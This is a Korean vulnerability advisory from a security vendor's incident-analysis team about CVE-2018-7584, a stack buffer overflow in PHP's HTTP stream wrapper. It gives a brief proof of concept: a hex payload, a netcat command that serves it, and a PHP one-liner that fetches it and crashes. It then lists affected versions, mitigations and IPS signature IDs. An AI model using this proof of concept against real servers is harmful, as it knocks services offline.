보안 동향 ㅣ 남아공, Adobe 적용된 자체 브라우저 공개
침해사고분석팀ㅣ2021.01.27
침해사고분석팀ㅣ2021.01.27
보안 동향 ㅣ 미공개 자료를 위해 보안 연구원들을 노리는 북한 해커들
침해사고분석팀ㅣ2021.01.27
침해사고분석팀ㅣ2021.01.27
침해사고분석팀ㅣ2021.01.26
취약점 정보[CVE-2018-7584] PHP http_fopen_wrapper Stack Buffe | ||||
작성일 | 2018-03-15 | 조회 | 2813 | |
---|---|---|---|---|
PHP에서 스택 버퍼 오버 플로우 취약점이보고되었습니다. 취약점은 HTTP 응답의 부적절한 구문 분석으로 인한 것입니다.
악용을 성공적으로 수행하면 대상 서버의 보안 컨텍스트에서 임의의 코드가 실행될 수 있습니다.
http://php.net/ChangeLog-7.php
[CVE-2018-7584] PHP http_fopen_wrapper Stack Buffer Overflow DoS
PHP http_fopen_wrapper Stack Buffer Overflow DoS.A 취약점은 HTTP 응답의 부적절한 구문 분석으로 서비스 거부를 발생시킵니다.
대상 PHP 서버는 악의적으로 조작된 HTTP Response 패킷을 처리하는 과정에 ext/standard/http_fopen_wrapper.c 소스 코드 파일에 정의된 php_stream_url_wrap_http_ex 함수가 범위를 벗어나는 큰 문자열을 복사하면서 Buffer Overflow가 발생합니다.
php_stream_url_wrap_http_ex /home/weilei/php-7.2.2/ext/standard/http_fopen_wrapper.c:723
1. POC 패이로드 확인
1.$ xxd -g 1 poc (공격서버에 악성페이로드를 삽입) 0000000: 30 30 30 30 30 30 30 30 30 31 30 30 0a 0a 000000000100..
2.NetCat을 이용해 poc를 전송
$ nc -vvlp 8080 < poc Listening on [0.0.0.0] (family 0, port 8080) Connection from [127.0.0.1] port 8080 [tcp/http-alt] accepted (family 2, sport 53083) GET / HTTP/1.0 Host: localhost:8080 Connection: close
3. php구문 실행 (타겟 서버에서 php구문을 실행해 공격서버에 HTTP 요청)
$ bin/php -r 'file_get_contents("http://localhost:8080");' #file_get_contents() 함수 사용 - php로 웹상(원격)에 있는 파일을 읽는 방법 단지 파라메터를 url로 주고 함수를 호출 한가지 기억해야할 점은 리턴받은 값을 사용하기 전에 error가 리턴 됬는지 확인 $content = file_get_contents('http://www.google.com/'); if ($content !== false) { // content 사용 } else { // error 발생 }
4. 악성페이로드를 HTTP 응답으로 받아 구문 처리하는 과정에 http_fopen_wrapper의 php_stream_url_wrap_http_ex 함수가 너무 큰 스트링을 복사해 서비스 중지 발생
취약시스템
PHP Group PHP 7.2.x through 7.2.2
PHP Group PHP 7.1.x through 7.1.14 PHP Group PHP 7.0.x before 7.0.28 PHP Group PHP 5.6.33 and prior
해결방안
1. 시스템 관리자는 신뢰할 수 있는 사용자만 네트워크에 액세스 할 수 있도록 허용
2. 시스템 관리자는 견고한 방화벽 전략을 사용하여 취약한 버전의 시스템을 외부 공격으로부터 보호 3. 시스템 관리자는 IP 기반 액세스 제어 목록 (ACL)을 사용하여 신뢰할 수있는 시스템만 취약한 버전의 시스템에 액세스 할 수 있도록 설정 4. 시스템 관리자는 취약한 버전의 시스템을 모니터링 5. 벤더사에서 제공하는 최신의 업데이트를 실시 - http://php.net/ChangeLog-7.php - https://bugs.php.net/bug.php?id=75981
► Sniper-IPS [4135] PHP http_fopen_wrapper Stack Buffer Overflow DoS
[4136] PHP http_fopen_wrapper Stack Buffer Overflow DoS.A
► Sniper-UTM [805374465] PHP http_fopen_wrapper Stack Buffer Overflow DoS
[805374466] PHP http_fopen_wrapper Stack Buffer Overflow DoS.A
► Sniper-APTX [3370] PHP http_fopen_wrapper Stack Buffer Overflow DoS
[3371] PHP http_fopen_wrapper Stack Buffer Overflow DoS.A
참조 http://php.net/ChangeLog-7.php http://www.securityfocus.com/bid/103204 |
||||
첨부파일 | 첨부파일이 없습니다. | |||
![]() ![]() ![]() |
||||
태그 | CVE-2018-7584 |